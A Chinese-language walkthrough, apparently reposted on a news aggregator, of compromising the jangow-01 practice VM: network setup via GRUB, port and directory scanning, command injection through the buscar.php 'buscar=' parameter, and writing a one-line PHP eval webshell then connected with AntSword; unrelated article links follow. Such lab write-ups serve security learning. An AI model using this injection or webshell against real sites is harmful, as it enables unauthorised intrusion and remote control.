当前位置: 首页 > news >正文

jangow-01-1.0.1靶机

news 2025/6/29 21:16:58

靶机 ip:192.168.152.155

把靶机的网络模式调成和攻击机kali一样的网络模式,我的kali是NAT模式,

在系统启动时(长按shift键)直到显示以下界面 ,我们选第二个,按回车。

继续选择第二个,这次按 e 进入编辑页面

接下来, 删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"

按 F10 或者 ctrl+x 启动

我们 cd 到 etc 下的 network 目录中修改 interfaces 文件(将网卡信息设置为 ens33),重启靶机即可生效。)

cd etc
cd network
vim interfaces

我们使用 nmap -sS 扫描端口

发现他开启了 80 和 21 端口

我们访问一下 80 端口

发现了一个 site 目录,点击进去是一个页面

我们继续使用 dirb 查一下他有什么文件

我们挨个访问一下,assets 是一个图片目录

css 是一个文件目录

访问到 buscar.php 中发现url 框中有参数 buscar=

我们输入一个 id 参数

页面有变化

这时我们就可以写入一个一句话木马

echo '<?php eval($_POST["cmd"]);' > 123.php

我们去访问一下 123.php

访问成功,使用蚁剑连接

获得 shell

http://www.lryc.cn/news/510996.html

相关文章:

  • MySQL 查询大偏移量(LIMIT)问题分析
  • Docker、containerd、安全沙箱、社区Kata Containers运行对比
  • 使用npm包的工程如何引入mapboxgl-enhance/maplibre-gl-enhance扩展包
  • 【NIFI】实现ORACLE->ORACLE数据同步
  • 单例模式的写法
  • Selenium实践总结
  • Python数据可视化小项目
  • Python毕业设计选题:基于python的白酒数据推荐系统_django+hive
  • SQL-leetcode-180. 连续出现的数字
  • Unity中如何修改Sprite的渲染网格
  • 跟着 8.6k Star 的开源数据库,搞 RAG!
  • 每日一题 345. 反转字符串中的元音字母
  • Stream API 的设计融合了多个经典设计模式
  • jmeter混合场景测试,设置多业务并发比例(吞吐量控制器)
  • 直流有刷电机多环控制(PID闭环死区和积分分离)
  • vue-axios+springboot实现文件流下载
  • selenium执行js
  • 每日算法Day11【左叶子之和、找树左下角的值、路径总和】
  • 分享一下使用 AI 开发个人工具的迭代过程
  • 大型语言模型(LLMs)演化树 Large Language Models
  • 部分背包问题
  • 教师管理系统
  • Word论文交叉引用一键上标
  • 集成方案 | Docusign + 蓝凌 EKP,打造一站式合同管理平台,实现无缝协作!
  • Python大数据可视化:基于python大数据的电脑硬件推荐系统_flask+Hadoop+spider
  • 【递归与回溯深度解析:经典题解精讲(下篇)】—— Leetcode
  • Spring boot处理跨域问题
  • 每日小题打卡
  • RockyLinux介绍及初始化
  • 2024年12月青少年软件编程(C语言/C++)等级考试试卷(三级)